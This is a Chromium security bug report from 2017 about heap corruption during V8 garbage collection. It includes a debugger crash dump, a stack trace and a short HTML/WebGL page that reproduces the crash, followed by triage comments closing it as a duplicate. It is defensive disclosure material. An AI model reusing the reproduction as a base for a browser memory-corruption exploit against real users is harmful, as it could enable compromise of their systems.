Issue 730576 link

Starred by 2 users

Issue metadata

Status:	Duplicate
Merged:	issue 729298
Owner:	█ hpayer@chromium.org Last visit > 30 days ago
Closed:	Jun 2017
Components:	Blink>JavaScript
EstimatedDays:	----
NextAction:	----
OS:	----
Pri:	----
Type:	Bug-Security
allpublic

Security: Memory corruption detected in V8 heap garbage collection

Reported by loobeny...@gmail.com, Jun 7 2017

Issue description


VULNERABILITY DETAILS
	Steps to reproduce:
	
	1. Open V8GcHeapCorruption_repro.html in  Chrome browser.
	2. Windows heap reports a heap corruption in a few minutes:

		Critical error detected c0000374
		(2620.1ab4): Break instruction exception - code 80000003 (first chance)
		(2620.1ab4): Unknown exception - code c0000374 (first chance)
		(2620.1ab4): Unknown exception - code c0000374 (!!! second chance !!!)
		eax=04efe710 ebx=770d5920 ecx=00000001 edx=00000021 esi=00000002 edi=3ec055dc
		eip=77099a8a esp=04efe6ec ebp=04efe77c iopl=0         nv up ei pl zr na pe nc
		cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
		ntdll!RtlReportCriticalFailure+0x88:
		77099a8a eb33            jmp     ntdll!RtlReportCriticalFailure+0xbd (77099abf)



VERSION

	Chromium	61.0.3123.0 (Developer Build) (32-bit) 

	Operating System: Windows 10 

REPRODUCTION CASE  (V8GcHeapCorruption_repro.html)

	<html><body onload="bodayonloadfun()" ><canvas id="test"></canvas></body><script>
	var canvas0=document.getElementById("test");
	var gl = canvas0.getContext("webgl");
	var program = gl.createProgram();
	gl.linkProgram(program);
	gl.useProgram(program);
	var frameBuf0= gl.createFramebuffer(); gl.bindFramebuffer(gl.FRAMEBUFFER, frameBuf0);
	function bodayonloadfun(){var curl = canvas0.toDataURL("image/jpeg",0.6);} 
	setTimeout(function(){location.reload()},100);
	</script></html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION

Type of crash: tab
Crash State: 


	ntdll!RtlReportCriticalFailure+0x88
	ntdll!RtlpReportHeapFailure+0x2f
	ntdll!RtlpHeapHandleError+0x16
	ntdll!RtlpLogHeapFailure+0x9f
	ntdll!RtlFreeHeap+0x54617
	chrome_child!base::allocator::WinHeapFree(void * ptr = 0x3ec055dc)+0x19 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\winheap_stubs_win.cc @ 43] 
	chrome_child!`anonymous namespace'::DefaultWinHeapFreeImpl(struct base::allocator::AllocatorDispatch * __formal = 0x65e049f0, void * address = 0x3ec055dc, void * context = 0x00000000)+0xb [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim_default_dispatch_to_winheap.cc @ 54] 
	chrome_child!ShimFree+0x10 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim.cc @ 264] 
	chrome_child!free(void * ptr = 0x3ec055dc)+0x13 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim_override_ucrt_symbols_win.h @ 55] 
	chrome_child!v8::String::ExternalStringResourceBase::`scalar deleting destructor'(void)+0x18
	chrome_child!v8::String::ExternalStringResourceBase::Dispose(void)+0xa [c:\b\c\b\win_syzyasan_lkgr\src\v8\include\v8.h @ 2529] 
	chrome_child!v8::internal::Heap::FinalizeExternalString+0xe [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 450] 
	chrome_child!v8::internal::ExternalStringTableCleaner::VisitRootPointers(v8::internal::Root root = kExternalStringsTable (0n1), class v8::internal::Object ** start = 0x08575448, class v8::internal::Object ** end = 0x08575450)+0x7d [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 1313] 
	chrome_child!v8::internal::Heap::ExternalStringTable::IterateNewSpaceStrings+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 707] 
	chrome_child!v8::internal::Heap::ExternalStringTable::IterateAll+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 713] 
	chrome_child!v8::internal::MarkCompactCollector::ClearNonLiveReferences(void)+0x267 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 2989] 
	chrome_child!v8::internal::MarkCompactCollector::CollectGarbage(void)+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 481] 
	chrome_child!v8::internal::Heap::MarkCompact(void)+0x67 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1494] 
	chrome_child!v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector collector = MARK_COMPACTOR (0n1), v8::GCCallbackFlags gc_callback_flags = kGCCallbackFlagCollectAllAvailableGarbage (0n16))+0x30e [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1358] 
	chrome_child!v8::internal::Heap::CollectGarbage(v8::internal::GarbageCollector collector = MARK_COMPACTOR (0n1), v8::internal::GarbageCollectionReason gc_reason = kMemoryPressure (0n16), char * collector_reason = 0x654f8ef4 "GC in old space requested", v8::GCCallbackFlags gc_callback_flags = kGCCallbackFlagCollectAllAvailableGarbage (0n16))+0x248 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1030]

V8GcHeapCorruption_repro.html
473 bytes View Download

Comment 1 by elawrence@chromium.org, Jun 7 2017

Components: Blink>JavaScript

Looks similar to  Issue 729298  ?

Comment 2 by jochen@chromium.org, Jun 7 2017

Owner: hpayer@chromium.org
Status: Assigned (was: Unconfirmed)

yes, I think that's indeed a duplicate

Comment 3 by lgar...@chromium.org, Jun 8 2017

Mergedinto: 729298
Status: Duplicate (was: Assigned)

Project Member

Comment 4 by sheriffbot@chromium.org, Sep 19 2017

Labels: -Restrict-View-SecurityTeam allpublic

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

►

Issue 730576 link

Issue metadata

Security: Memory corruption detected in V8 heap garbage collection

Issue description

Comment 1 by elawrence@chromium.org, Jun 7 2017

Comment 1 Deleted

Comment 2 by jochen@chromium.org, Jun 7 2017

Comment 2 Deleted

Comment 3 by lgar...@chromium.org, Jun 8 2017

Comment 3 Deleted

Comment 4 by sheriffbot@chromium.org, Sep 19 2017

Comment 4 Deleted

Sign in to add a comment